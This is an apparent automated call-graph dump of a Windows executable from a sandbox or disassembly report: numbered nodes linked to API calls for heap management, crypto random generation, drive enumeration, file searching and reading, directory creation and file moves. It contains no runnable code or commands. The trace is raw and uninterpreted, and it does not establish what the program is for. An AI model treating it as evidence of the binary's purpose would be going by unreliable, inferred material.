16674 16472 16671->16674 16672->15624 16673 16499 GetProcessHeap HeapFree 16676 164b1 16673->16676 16677 164b6 16673->16677 16674->16673 16679 18e6f 3 API calls 16674->16679 16681 16497 16674->16681 18630 19c21 16674->18630 16678 19a29 GetLastError 16676->16678 16677->16672 18641 192bb 16677->18641 16678->16677 16679->16674 16681->16673 16683 15cf6 16682->16683 16684 15cfd 16682->16684 16685 19166 6 API calls 16683->16685 16684->16683 16686 15d24 16684->16686 16687 15d8c 16685->16687 16688 19166 6 API calls 16686->16688 16689 15da1 16687->16689 16690 15d90 16687->16690 16691 15d31 16688->16691 16693 15da9 16689->16693 16694 15dcd 16689->16694 16692 1854a 118 API calls 16690->16692 16691->16690 16696 15d35 16691->16696 16697 15d9c 16692->16697 16698 19166 6 API calls 16693->16698 16695 292a7 99 API calls 16694->16695 16700 15d53 16695->16700 18678 18dae 16696->18678 16702 15df6 16697->16702 16704 18e6f 3 API calls 16697->16704 16699 15dbc MessageBoxW 16698->16699 16699->16700 16700->16697 16708 18e6f 3 API calls 16700->16708 16705 15e04 16702->16705 16709 18e6f 3 API calls 16702->16709 16704->16702 16705->15622 16706 15d47 16710 1854a 118 API calls 16706->16710 16707 15d5b 16711 18abb 6 API calls 16707->16711 16708->16697 16709->16705 16710->16700 16712 15d67 16711->16712 16712->16689 16713 15d6b 16712->16713 16714 1854a 118 API calls 16713->16714 16714->16700 18687 32fe1 16715->18687 16722 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 16723 15c14 16722->16723 16724 18e9c GetTimeZoneInformation GetSystemTime SystemTimeToTzSpecificLocalTime 16723->16724 16725 18b7e 112 API calls 16724->16725 16726 18f06 16725->16726 16727 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 16726->16727 16728 15c25 16727->16728 16728->15637 16728->15639 16730 18e8a 16729->16730 16731 18e8e 16729->16731 16730->15640 16732 19a29 GetLastError 16731->16732 16732->16730 16734 199dd 16733->16734 16736 19a21 16734->16736 16737 199e8 GetModuleFileNameW 16734->16737 16741 187eb 16734->16741 16736->16487 16738 19a04 GetLastError 16737->16738 16739 199f7 16737->16739 16740 19a00 16738->16740 16739->16734 16739->16740 16740->16736 16742 18820 16741->16742 16743 187f7 16741->16743 16742->16734 16744 18811 GetProcessHeap HeapAlloc 16743->16744 16745 18800 GetProcessHeap HeapReAlloc 16743->16745 16744->16742 16745->16742 16773 19926 16746->16773 16749 19cc1 CreateFileW 16750 19cda 16749->16750 16751 1843a 16750->16751 16752 18e6f 3 API calls 16750->16752 16751->16499 16751->16500 16752->16751 16754 186d9 16753->16754 16755 185f5 16753->16755 16758 186f2 16754->16758 16759 18e6f 3 API calls 16754->16759 16755->16754 16756 18601 GetModuleFileNameW 16755->16756 16757 18619 _memset 16756->16757 16794 19a63 16757->16794 16760 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 16758->16760 16759->16758 16762 18700 16760->16762 16762->16502 16765 18671 _memset 16766 18e9c 115 API calls 16765->16766 16767 1868d 16766->16767 16767->16754 16768 184c7 118 API calls 16767->16768 16769 186a5 16768->16769 16770 184c7 118 API calls 16769->16770 16771 186c8 16770->16771 16772 184c7 118 API calls 16771->16772 16772->16754 16774 18889 7 API calls 16773->16774 16775 19938 16774->16775 16777 19960 16775->16777 16780 19871 16775->16780 16776 19972 16776->16749 16776->16750 16777->16776 16778 18e6f 3 API calls 16777->16778 16778->16776 16782 1988e 16780->16782 16781 19913 16781->16777 16782->16781 16785 198b5 ___BuildCatchObjectHelper 16782->16785 16786 19a43 GetProcessHeap HeapSize 16782->16786 16785->16781 16787 189d6 16785->16787 16786->16785 16788 189f1 16787->16788 16790 189f7 16787->16790 16793 19a43 GetProcessHeap HeapSize 16788->16793 16791 187eb 4 API calls 16790->16791 16792 189fe _memmove ___BuildCatchObjectHelper 16790->16792 16791->16792 16792->16781 16793->16790 16795 19926 10 API calls 16794->16795 16796 19a86 16795->16796 16797 19a90 GetFileVersionInfoSizeW 16796->16797 16802 19ab0 16796->16802 16799 19aa4 GetLastError 16797->16799 16800 19ace GlobalAlloc 16797->16800 16798 18645 GetComputerNameW 16798->16765 16799->16802 16800->16802 16803 19ae4 GetFileVersionInfoW 16800->16803 16801 18e6f 3 API calls 16801->16798 16802->16798 16802->16801 16804 19b10 GetLastError 16803->16804 16805 19af6 VerQueryValueW 16803->16805 16807 19b1c GlobalFree 16804->16807 16805->16804 16805->16807 16807->16802 16809 19ca3 11 API calls 16808->16809 16810 19d1f 16809->16810 16811 19d29 GetLastError 16810->16811 16812 19d4c GetProcessHeap HeapAlloc 16810->16812 16813 160c2 16811->16813 16814 19d63 16812->16814 16813->16508 16813->16509 16815 19d91 16814->16815 16818 18889 7 API calls 16814->16818 16816 19da2 16815->16816 16817 19da9 16815->16817 16819 1a414 8 API calls 16816->16819 16817->16813 16820 19daf CloseHandle 16817->16820 16821 19d86 16818->16821 16819->16817 16820->16813 16821->16815 16823 1a505 16821->16823 16839 19b6a SetFilePointerEx 16823->16839 16825 1a566 16825->16815 16826 1a572 GetProcessHeap RtlReAllocateHeap 16830 1a52c 16826->16830 16832 1a603 16826->16832 16827 1a54f GetProcessHeap RtlAllocateHeap 16827->16825 16828 1a58e ReadFile 16827->16828 16829 1a60c GetLastError 16828->16829 16828->16830 16829->16832 16830->16825 16830->16826 16830->16827 16830->16828 16834 1a5da 16830->16834 16831 1a65e GetProcessHeap HeapFree 16831->16825 16833 1a670 16831->16833 16832->16825 16832->16831 16842 19a29 GetLastError 16833->16842 16834->16832 16836 1a5de GetProcessHeap HeapAlloc 16834->16836 16836->16832 16837 1a5ef GetProcessHeap HeapAlloc 16836->16837 16837->16832 16838 1a635 _memmove 16837->16838 16838->16832 16840 19b96 16839->16840 16841 19b8c GetLastError 16839->16841 16840->16830 16841->16840 16843 19a33 16842->16843 16843->16825 16845 19de2 16844->16845 16846 19dec 16844->16846 16845->16512 16888 1a3dc GetProcessHeap HeapAlloc 16846->16888 16849 19e02 GetProcessHeap HeapAlloc 16850 19e2b 16849->16850 16863 19e21 16849->16863 16852 19e57 16850->16852 16854 18889 7 API calls 16850->16854 16851 1a46e 12 API calls 16851->16845 16853 19e7e GetCurrentProcess GetCurrentProcess DuplicateHandle 16852->16853 16855 19e6c 16852->16855 16852->16863 16856 19ea7 16853->16856 16857 19e9b GetLastError 16853->16857 16854->16852 16908 1a7b1 16855->16908 16859 18889 7 API calls 16856->16859 16856->16863 16857->16856 16861 19ec4 16859->16861 16861->16863 16890 1ab0c 16861->16890 16863->16845 16863->16851 16865 19f1a 16864->16865 16866 19f47 GetProcessHeap HeapAlloc 16865->16866 16867 19f64 16865->16867 16866->16867 16867->16519 16869 1a475 FindCloseChangeNotification 16868->16869 16870 1a47c 16868->16870 16869->16870 16871 1a491 GetProcessHeap HeapFree 16870->16871 16872 1a4a2 16870->16872 16871->16872 16873 1a49d 16871->16873 16874 1a4a9 GetProcessHeap HeapFree 16872->16874 16875 1a4ba 16872->16875 16876 19a29 GetLastError 16873->16876 16874->16875 16877 1a4b5 16874->16877 16878 1a4c1 GetProcessHeap HeapFree 16875->16878 16879 1a4d2 16875->16879 16876->16872 16882 19a29 GetLastError 16877->16882 16878->16879 16880 1a4cd 16878->16880 16881 1a4df 16879->16881 16884 18e6f 3 API calls 16879->16884 16883 19a29 GetLastError 16880->16883 16885 1a4ec GetProcessHeap HeapFree 16881->16885 16886 18e6f 3 API calls 16881->16886 16882->16875 16883->16879 16884->16881 16887 1a4fa 16885->16887 16886->16885 16887->16519 16889 19df5 16888->16889 16889->16849 16889->16863 16891 19b6a 2 API calls 16890->16891 16892 1ab35 16891->16892 16893 1ab64 16892->16893 16894 1ab40 ReadFile 16892->16894 16897 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 16893->16897 16895 1ab57 GetLastError 16894->16895 16896 1ab86 16894->16896 16895->16893 16896->16893 16898 1ab98 GetProcessHeap HeapAlloc 16896->16898 16899 1ac60 16897->16899 16900 1abb2 16898->16900 16901 1abbe 16898->16901 16899->16863 16900->16893 16902 1abce ReadFile 16901->16902 16904 1abf3 16901->16904 16902->16901 16903 1ac01 GetLastError 16902->16903 16903->16904 16904->16893 16905 1ac37 GetProcessHeap HeapFree 16904->16905 16905->16893 16906 1ac4c 16905->16906 16907 19a29 GetLastError 16906->16907 16907->16893 16935 19711 16908->16935 16911 1a984 16913 1a997 16911->16913 16915 18e6f 3 API calls 16911->16915 16912 18889 7 API calls 16914 1a810 16912->16914 16916 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 16913->16916 16918 1a96f 16914->16918 16939 18abb 16914->16939 16915->16913 16917 19e7c 16916->16917 16917->16861 16918->16911 16920 18e6f 3 API calls 16918->16920 16920->16911 16921 1a82b 16921->16918 16922 1a835 FindFirstFileW 16921->16922 16923 1a853 GetLastError 16922->16923 16931 1a85f 16922->16931 16923->16931 16924 1a8f7 FindNextFileW 16927 1a912 16924->16927 16924->16931 16925 1a935 16925->16918 16929 1a963 FindClose 16925->16929 16926 18889 7 API calls 16926->16931 16927->16925 16928 1a94e CloseHandle 16927->16928 16928->16925 16929->16918 16930 18abb 6 API calls 16930->16931 16931->16918 16931->16924 16931->16926 16931->16927 16931->16930 16933 1a914 16931->16933 16945 1a9ae 16931->16945 16934 18889 7 API calls 16933->16934 16934->16927 16936 19761 16935->16936 16937 19724 16935->16937 16936->16911 16936->16912 16937->16936 16938 18889 7 API calls 16937->16938 16938->16936 16940 18ad1 16939->16940 16942 18ad7 16939->16942 16956 19a43 GetProcessHeap HeapSize 16940->16956 16943 187eb 4 API calls 16942->16943 16944 18ade 16942->16944 16943->16944 16944->16921 16946 19ca3 11 API calls 16945->16946 16947 1a9e7 16946->16947 16948 1aa1d ReadFile 16947->16948 16949 1a9ee GetLastError 16947->16949 16951 1aa36 GetLastError 16948->16951 16955 1aa43 16948->16955 16950 1a9fb 16949->16950 16952 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 16950->16952 16951->16955 16954 1ab03 16952->16954 16953 1aaec CloseHandle 16953->16950 16954->16931 16955->16950 16955->16953 16956->16942 16958 16f74 16957->16958 16959 16f9a 16958->16959 16960 16fa7 16958->16960 16962 16f83 16958->16962 16961 16f09 16959->16961 16964 16fc9 GetModuleHandleW DialogBoxParamW 16959->16964 16966 16fa0 16959->16966 17000 173a1 16960->17000 16961->16526 16973 191d3 16961->16973 17020 195c3 16962->17020 16964->16961 16967 16fe9 16964->16967 16971 1854a 118 API calls 16966->16971 16969 1854a 118 API calls 16967->16969 16970 16ff4 16969->16970 16970->16961 16970->16966 16971->16961 16972 1854a 118 API calls 16972->16959 16974 19926 10 API calls 16973->16974 16975 191eb 16974->16975 16976 1924e 16975->16976 16977 191f8 GetFileAttributesW 16975->16977 16980 16f20 16976->16980 16982 18e6f 3 API calls 16976->16982 16978 19204 16977->16978 16979 1920c CreateDirectoryW 16977->16979 16978->16976 16978->16979 16979->16976 16981 1921e GetLastError 16979->16981 16980->16526 16980->16530 16981->16976 16983 1922b 16981->16983 16982->16980 16983->16976 16984 191d3 10 API calls 16983->16984 16985 19263 16984->16985 16985->16976 16986 1926f CreateDirectoryW 16985->16986 16986->16976 16987 1927d GetLastError 16986->16987 16988 1928a 16987->16988 16988->16976 16990 17c20 LoadLibraryW 16989->16990 16991 17c8c DecryptFileW 16989->16991 16993 17c53 GetProcAddress 16990->16993 16994 17c2f GetLastError 16990->16994 16992 17c9b GetLastError 16991->16992 16999 16f3d 16991->16999 16997 17ca5 16992->16997 16993->16991 16996 17c68 GetLastError 16993->16996 16995 17c39 16994->16995 16995->16997 16996->16995 16998 1854a 118 API calls 16997->16998 16998->16999 16999->16533 17031 1774a 17000->17031 17003 173c7 17005 1854a 118 API calls 17003->17005 17004 173d6 17071 1751d CryptAcquireContextA 17004->17071 17010 173d2 17005->17010 17009 173ec 17012 18abb 6 API calls 17009->17012 17018 173f2 17009->17018 17011 1745d 17010->17011 17013 18e6f 3 API calls 17010->17013 17011->16959 17014 17406 17012->17014 17013->17011 17014->17018 17101 1997e 17014->17101 17015 1854a 118 API calls 17016 1742c 17015->17016 17016->17010 17019 18e6f 3 API calls 17016->17019 17018->17015 17018->17016 17019->17010 17021 187eb 4 API calls 17020->17021 17022 195db GetCurrentDirectoryW 17021->17022 17023 195f0 17022->17023 17024 1960d GetLastError 17022->17024 17025 19619 17023->17025 17026 187eb 4 API calls 17023->17026 17024->17025 17027 16f89 17025->17027 17029 18e6f 3 API calls 17025->17029 17028 195fd 17026->17028 17027->16959 17027->16972 17028->17025 17030 19603 GetCurrentDirectoryW 17028->17030 17029->17027 17030->17024 17030->17025 17106 17cd0 17031->17106 17034 177a7 17036 184c7 118 API calls 17034->17036 17035 187eb 4 API calls 17037 1778f 17035->17037 17038 177b6 17036->17038 17037->17034 17039 17795 17037->17039 17040 187eb 4 API calls 17038->17040 17042 1854a 118 API calls 17039->17042 17041 177c6 17040->17041 17043 177d6 GetLogicalDriveStringsW 17041->17043 17048 177cc 17041->17048 17044 177a0 17042->17044 17045 17819 17043->17045 17046 177ee GetLastError 17043->17046 17047 173c1 17044->17047 17050 18e6f 3 API calls 17044->17050 17051 187eb 4 API calls 17045->17051 17061 17834 _wcschr 17045->17061 17046->17048 17047->17003 17047->17004 17049 1854a 118 API calls 17048->17049 17052 179de 17048->17052 17049->17052 17050->17047 17054 17826 17051->17054 17052->17044 17057 18e6f 3 API calls 17052->17057 17053 17841 CharUpperW 17055 184c7 118 API calls 17053->17055 17054->17048 17056 1782c GetLogicalDriveStringsW 17054->17056 17055->17061 17056->17061 17057->17044 17059 184c7 118 API calls 17059->17061 17061->17048 17061->17053 17061->17059 17064 1794e 17061->17064 17066 178ce GetDiskFreeSpaceExW 17061->17066 17131 17a0a GetDriveTypeW SetErrorMode SetErrorMode 17061->17131 17140 1768d 17061->17140 17148 17ae7 SetErrorMode SetErrorMode 17061->17148 17063 179ab 17063->17048 17068 184c7 118 API calls 17063->17068 17064->17048 17064->17063 17065 1797f 17064->17065 17067 184c7 118 API calls 17065->17067 17066->17061 17069 1798e 17067->17069 17068->17069 17070 18889 7 API calls 17069->17070 17070->17048 17072 17562 GetLastError 17071->17072 17073 1758d CryptGenRandom 17071->17073 17081 1756e 17072->17081 17074 175a0 GetLastError 17073->17074 17086 175cb 17073->17086 17074->17081 17075 17641 17077 17668 17075->17077 17078 1765e CryptReleaseContext 17075->17078 17076 18b7e 112 API calls 17076->17086 17080 17675 17077->17080 17082 18e6f 3 API calls 17077->17082 17078->17077 17079 1854a 118 API calls 17079->17075 17083 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17080->17083 17081->17079 17082->17080 17084 173df 17083->17084 17084->17009 17088 1746a UuidCreate 17084->17088 17085 18abb 6 API calls 17085->17086 17086->17075 17086->17076 17086->17081 17086->17085 17087 18e6f 3 API calls 17086->17087 17087->17086 17089 174aa 17088->17089 17090 174b4 17089->17090 17091 174bb UuidToStringW 17089->17091 17094 1854a 118 API calls 17090->17094 17092 174cd 17091->17092 17092->17090 17093 174e6 17092->17093 17096 174e2 17094->17096 17343 18e38 17101->17343 17107 187eb 4 API calls 17106->17107 17108 17cfc 17107->17108 17119 17d02 17108->17119 17165 1805a 17108->17165 17110 1854a 118 API calls 17112 17d0d 17110->17112 17113 17e8d 17112->17113 17116 18e6f 3 API calls 17112->17116 17117 18e6f 3 API calls 17113->17117 17120 17780 17113->17120 17114 17d34 GetLastError 17114->17119 17115 17d5c 17118 17d6c GetLastError 17115->17118 17126 17d97 17115->17126 17116->17113 17117->17120 17118->17119 17119->17110 17120->17034 17120->17035 17122 17e52 17122->17112 17124 18e6f 3 API calls 17122->17124 17123 1854a 118 API calls 17123->17122 17124->17112 17126->17122 17127 184c7 118 API calls 17126->17127 17128 18abb 6 API calls 17126->17128 17129 18e6f 3 API calls 17126->17129 17130 17e4b 17126->17130 17199 17ee0 17126->17199 17233 18341 17126->17233 17127->17126 17128->17126 17129->17126 17130->17123 17132 17a71 CreateFileW 17131->17132 17135 17a61 17131->17135 17134 17a9d DeviceIoControl 17132->17134 17132->17135 17133 17acb SetErrorMode 17138 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17133->17138 17136 17ac0 CloseHandle 17134->17136 17137 17aba 17134->17137 17135->17133 17136->17133 17137->17133 17137->17136 17139 17ade 17138->17139 17139->17061 17141 2de40 _memset 17140->17141 17142 176d7 QueryDosDeviceW 17141->17142 17143 176f9 17142->17143 17147 176f5 17142->17147 17299 29522 17143->17299 17145 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17146 17743 17145->17146 17146->17061 17147->17145 17159 17b0f 17148->17159 17149 1746a 126 API calls 17149->17159 17150 17bec 17152 1854a 118 API calls 17150->17152 17151 18b7e 112 API calls 17151->17159 17153 17bc1 17152->17153 17155 17bd1 17153->17155 17157 18e6f 3 API calls 17153->17157 17154 19926 10 API calls 17154->17159 17158 17bde SetErrorMode 17155->17158 17161 18e6f 3 API calls 17155->17161 17156 17b5b CreateDirectoryW 17156->17159 17160 17b6d RemoveDirectoryW 17156->17160 17157->17155 17158->17061 17159->17149 17159->17150 17159->17151 17159->17153 17159->17154 17159->17156 17163 18e6f GetProcessHeap HeapFree GetLastError 17159->17163 17164 17c09 17159->17164 17160->17159 17162 17b78 MoveFileExW 17160->17162 17161->17158 17162->17159 17163->17159 17164->17158 17166 1807a 17165->17166 17178 181f6 17165->17178 17168 187eb 4 API calls 17166->17168 17167 1823c 17170 17d19 17167->17170 17172 18e6f 3 API calls 17167->17172 17171 1808b 17168->17171 17169 18e6f 3 API calls 17169->17167 17170->17114 17170->17115 17170->17119 17173 1809b GetSystemDirectoryW 17171->17173 17191 18091 17171->17191 17172->17170 17174 180d4 17173->17174 17175 180a9 GetLastError 17173->17175 17177 180fa 17174->17177 17179 187eb 4 API calls 17174->17179 17175->17191 17176 1854a 118 API calls 17176->17178 17242 18b7e 17177->17242 17178->17167 17178->17169 17181 180e2 17179->17181 17183 180e8 GetSystemDirectoryW 17181->17183 17181->17191 17183->17175 17185 180f6 17183->17185 17184 1811e LoadLibraryW 17186 18158 GetProcAddress 17184->17186 17187 1812d GetLastError 17184->17187 17185->17175 17185->17177 17188 18173 GetProcAddress 17186->17188 17189 181f8 GetLastError 17186->17189 17187->17191 17188->17189 17190 18184 GetProcAddress 17188->17190 17189->17191 17190->17189 17192 18195 GetProcAddress 17190->17192 17191->17176 17192->17189 17193 181a6 GetProcAddress 17192->17193 17193->17189 17194 181b7 GetProcAddress 17193->17194 17194->17189 17195 181c8 GetProcAddress 17194->17195 17195->17189 17196 181d9 GetProcAddress 17195->17196 17196->17189 17197 181ea 17196->17197 17198 184c7 118 API calls 17197->17198 17198->17178 17200 187eb 4 API calls 17199->17200 17201 17f03 17200->17201 17202 17f0a 17201->17202 17203 17f1c 17201->17203 17204 1854a 118 API calls 17202->17204 17262 18254 17203->17262 17206 17f15 17204->17206 17209 1804e 17206->17209 17212 18e6f 3 API calls 17206->17212 17208 17f34 17213 1854a 118 API calls 17208->17213 17209->17126 17210 184c7 118 API calls 17211 17f49 17210->17211 17276 296d7 17211->17276 17212->17209 17225 17f68 17213->17225 17216 17f5d 17221 184c7 118 API calls 17216->17221 17217 17f6f 17222 18254 122 API calls 17217->17222 17218 18011 GetProcessHeap HeapFree 17219 18024 17218->17219 17223 1801f 17218->17223 17219->17206 17220 1802a GetProcessHeap HeapFree 17219->17220 17220->17206 17224 18038 17220->17224 17221->17225 17226 17f80 17222->17226 17227 19a29 GetLastError 17223->17227 17228 19a29 GetLastError 17224->17228 17225->17218 17225->17219 17226->17208 17231 17f96 17226->17231 17227->17219 17228->17206 17229 184c7 118 API calls 17229->17231 17230 17fcd CharUpperW 17231->17225 17231->17229 17231->17230 17234 187eb 4 API calls 17233->17234 17237 18362 17234->17237 17235 1854a 118 API calls 17236 183bf 17235->17236 17240 1840b 17236->17240 17241 18e6f 3 API calls 17236->17241 17238 187eb 4 API calls 17237->17238 17239 18394 17237->17239 17238->17239 17239->17235 17239->17236 17240->17126 17241->17240 17245 18b99 17242->17245 17246 18bb4 17245->17246 17247 18bda 17245->17247 17258 19a43 GetProcessHeap HeapSize 17246->17258 17248 187eb 4 API calls 17247->17248 17257 18be6 17248->17257 17250 18bba 17251 1810b 17250->17251 17252 18bcb lstrlenW 17250->17252 17251->17184 17251->17191 17252->17247 17252->17257 17254 18c7e 17254->17251 17256 18e6f 3 API calls 17254->17256 17255 187eb 4 API calls 17255->17257 17256->17251 17257->17251 17257->17254 17257->17255 17259 330da 17257->17259 17258->17250 17260 33004 __vsnwprintf_l 102 API calls 17259->17260 17261 330f2 17260->17261 17261->17257 17263 1827a 17262->17263 17264 182a5 GetProcessHeap HeapAlloc 17263->17264 17266 18293 17263->17266 17265 182be 17264->17265 17270 182d5 17264->17270 17267 1854a 118 API calls 17265->17267 17269 1854a 118 API calls 17266->17269 17268 17f2d 17267->17268 17268->17208 17268->17210 17269->17268 17271 1830b 17270->17271 17273 1854a 118 API calls 17270->17273 17271->17268 17272 1831a GetProcessHeap HeapFree 17271->17272 17272->17268 17274 1832d 17272->17274 17273->17271 17275 19a29 GetLastError 17274->17275 17275->17268 17277 296e6 17276->17277 17278 2974f 17276->17278 17280 2b059 __fclose_nolock 66 API calls 17277->17280 17283 17f56 17277->17283 17284 295cf 17278->17284 17281 296f2 17280->17281 17282 2affd __fclose_nolock 11 API calls 17281->17282 17282->17283 17283->17216 17283->17217 17285 292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 17284->17285 17286 295e3 17285->17286 17287 29610 17286->17287 17288 295ea 17286->17288 17290 29618 17287->17290 17296 2963f 17287->17296 17289 2b059 __fclose_nolock 66 API calls 17288->17289 17291 295ef 17289->17291 17292 2b059 __fclose_nolock 66 API calls 17290->17292 17297 2cee1 78 API calls __towlower_l 17296->17297 17298 295fa 17296->17298 17297->17296 17298->17283 17302 294ea 17299->17302 17303 292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 17302->17303 17304 294fd 17303->17304 17307 29375 17304->17307 17308 29391 17307->17308 17309 293a5 _wcsnlen 17307->17309 17310 2b059 __fclose_nolock 66 API calls 17308->17310 17309->17308 17311 293bc 17309->17311 17349 1678d 17348->17349 17354 1635a 17348->17354 17350 167a5 GetModuleHandleW 17349->17350 17352 1685e 17349->17352 17419 19166 17350->17419 17352->17354 17357 168bf 17352->17357 17358 168ae DeleteCriticalSection 17352->17358 17354->16547 17354->16562 17355 16812 CreateThread 17360 16862 WaitForSingleObject SendMessageA SendMessageA 17355->17360 17361 1682b GetLastError 17355->17361 17425 16a1b DialogBoxParamA 17355->17425 17356 167e5 GetLastError 17365 167f2 17356->17365 17359 168ce 17357->17359 17362 18e6f 3 API calls 17357->17362 17358->17357 17363 168e0 17359->17363 17364 168dd CloseHandle 17359->17364 17360->17352 17361->17365 17362->17359 17363->17354 17366 168e9 CloseHandle 17363->17366 17364->17363 17367 1854a 118 API calls 17365->17367 17366->17354 17367->17352 17369 169c0 17368->17369 17370 169ba 17368->17370 17371 169c8 SendMessageA 17369->17371 17372 169db 17369->17372 17370->16566 17371->17372 17372->16566 17374 1a265 17373->17374 17375 1a23a 17373->17375 17377 199d2 6 API calls 17374->17377 17376 18889 7 API calls 17375->17376 17378 1a247 17376->17378 17383 1a259 17377->17383 17379 1a283 17378->17379 17380 1997e 6 API calls 17378->17380 17381 1a3ce 17379->17381 17382 18e6f 3 API calls 17379->17382 17380->17383 17381->16566 17382->17381 17383->17379 17384 18abb 6 API calls 17383->17384 17390 1a2c2 17383->17390 17385 1a2b0 17384->17385 17385->17379 17386 1997e 6 API calls 17385->17386 17386->17390 17387 18889 7 API calls 17387->17390 17388 1a3ab 17388->17379 17389 18e6f 3 API calls 17388->17389 17389->17379 17390->17379 17390->17387 17390->17388 17391 1a37f 17390->17391 17392 18abb 6 API calls 17390->17392 17394 1a337 lstrlenW 17390->17394 17429 1ac67 17390->17429 17441 1ade5 17391->17441 17392->17390 17394->17390 17397 1a012 _memset __write_nolock 17396->17397 17398 1a08f 17397->17398 17399 164d8 135 API calls 17397->17399 17400 1a1a4 17398->17400 17401 19b6a 2 API calls 17398->17401 17399->17398 17402 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17400->17402 17403 1a0b5 17401->17403 17404 1a21b 17402->17404 17403->17400 17405 164d8 135 API calls 17403->17405 17409 1a0da 17403->17409 17404->16563 17405->17409 17406 1a110 ReadFile 17407 1a198 GetLastError 17406->17407 17406->17409 17407->17400 17408 164d8 135 API calls 17408->17409 17409->17400 17409->17406 17409->17408 17410 1a1bb 17409->17410 18291 34850 17410->18291 17413 164d8 135 API calls 17413->17400 17415 169f0 EnterCriticalSection 17414->17415 17416 16a12 17414->17416 17417 16a05 17415->17417 17418 16a0a LeaveCriticalSection 17415->17418 17416->16562 17417->17418 17418->17416 17422 19173 17419->17422 17420 187eb 4 API calls 17420->17422 17421 19180 LoadStringW 17421->17422 17423 191a4 GetLastError 17421->17423 17422->17420 17422->17421 17424 167c1 InitializeCriticalSection CreateEventA 17422->17424 17423->17424 17424->17355 17424->17356 17426 16a49 17425->17426 17427 16a3e 17425->17427 17428 1854a 118 API calls 17427->17428 17428->17426 17430 1aca4 17429->17430 17431 1aca7 17430->17431 17477 188ed 17430->17477 17434 1adcc 17431->17434 17437 18e6f 3 API calls 17431->17437 17435 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17434->17435 17438 1addb 17435->17438 17436 1acf6 #20 17436->17431 17439 1ad54 17436->17439 17437->17434 17438->17390 17442 1adf4 __write_nolock 17441->17442 17443 184c7 118 API calls 17442->17443 17444 1ae1e 17443->17444 17445 1ae47 17444->17445 18195 164d8 17444->18195 17447 19711 7 API calls 17445->17447 17449 1b045 17445->17449 17448 1ae63 17447->17448 17451 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17449->17451 17478 18904 17477->17478 17479 1891e WideCharToMultiByte 17477->17479 17521 19a43 GetProcessHeap HeapSize 17478->17521 17481 18998 GetLastError 17479->17481 17483 18936 17479->17483 17485 18912 17481->17485 17482 1890a 17482->17479 17482->17485 17484 18984 WideCharToMultiByte 17483->17484 17483->17485 17486 18954 GetProcessHeap HeapReAlloc 17483->17486 17487 18966 GetProcessHeap HeapAlloc 17483->17487 17484->17481 17484->17485 17485->17431 17485->17436 17488 18975 17486->17488 17487->17488 17488->17484 17488->17485 17521->17482 18196 164ea 18195->18196 18215 164f9 18195->18215 18198 164f1 18196->18198 18199 16553 18196->18199 18200 16505 18196->18200 18201 16544 18196->18201 18202 1657b 18196->18202 18196->18215 18197 169e3 2 API calls 18203 16574 18197->18203 18221 165f9 18198->18221 18205 169b0 SendMessageA 18199->18205 18211 169b0 SendMessageA 18200->18211 18200->18215 18206 165f9 128 API calls 18201->18206 18212 169b0 SendMessageA 18202->18212 18202->18215 18211->18200 18212->18202 18215->18197 18215->18203 18292 34882 _memset 18291->18292 18293 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 18292->18293 18294 1a1cb 18293->18294 18294->17400 18294->17413 18296 19926 10 API calls 18295->18296 18297 19679 18296->18297 18298 1967f SetCurrentDirectoryW 18297->18298 18302 19698 18297->18302 18300 1968c GetLastError 18298->18300 18298->18302 18299 15e5f 18299->16591 18299->16605 18300->18302 18301 18e6f 3 API calls 18301->18299 18302->18299 18302->18301 18323 2bf47 18322->18323 18324 2bf5c 18322->18324 18326 2b059 __fclose_nolock 66 API calls 18323->18326 18325 2bf6a 18324->18325 18327 2bf77 18324->18327 18328 2b059 __fclose_nolock 66 API calls 18325->18328 18329 2bf4c 18326->18329 18338 2be41 18327->18338 18330 2bf6f 18328->18330 18332 2affd __fclose_nolock 11 API calls 18329->18332 18335 2affd __fclose_nolock 11 API calls 18330->18335 18334 2bf57 18332->18334 18334->16629 18336 2bfaf 18335->18336 18336->16629 18337 2b059 __fclose_nolock 66 API calls 18337->18330 18339 2be77 18338->18339 18340 2be5f 18338->18340 18341 2be9e 18339->18341 18343 2be86 18339->18343 18342 2b059 __fclose_nolock 66 API calls 18340->18342 18349 2bee5 18341->18349 18351 2be6f 18341->18351 18353 2b0db 18341->18353 18344 2be64 18342->18344 18345 2b059 __fclose_nolock 66 API calls 18343->18345 18346 2affd __fclose_nolock 11 API calls 18344->18346 18347 2be8b 18345->18347 18346->18351 18348 2affd __fclose_nolock 11 API calls 18347->18348 18348->18351 18349->18351 18352 2b0db __flsbuf 97 API calls 18349->18352 18351->18336 18351->18337 18352->18351 18374 2e8bc 18353->18374 18355 2b0eb 18356 2b0f6 18355->18356 18357 2b10d 18355->18357 18358 2b059 __fclose_nolock 66 API calls 18356->18358 18359 2b111 18357->18359 18367 2b11e __flsbuf 18357->18367 18365 2b0fb 18358->18365 18360 2b059 __fclose_nolock 66 API calls 18359->18360 18360->18365 18361 2b20e 18364 2e73a __write 97 API calls 18361->18364 18362 2b18e 18363 2b1a5 18362->18363 18369 2b1c2 18362->18369 18393 2e73a 18363->18393 18364->18365 18365->18349 18367->18365 18370 2b174 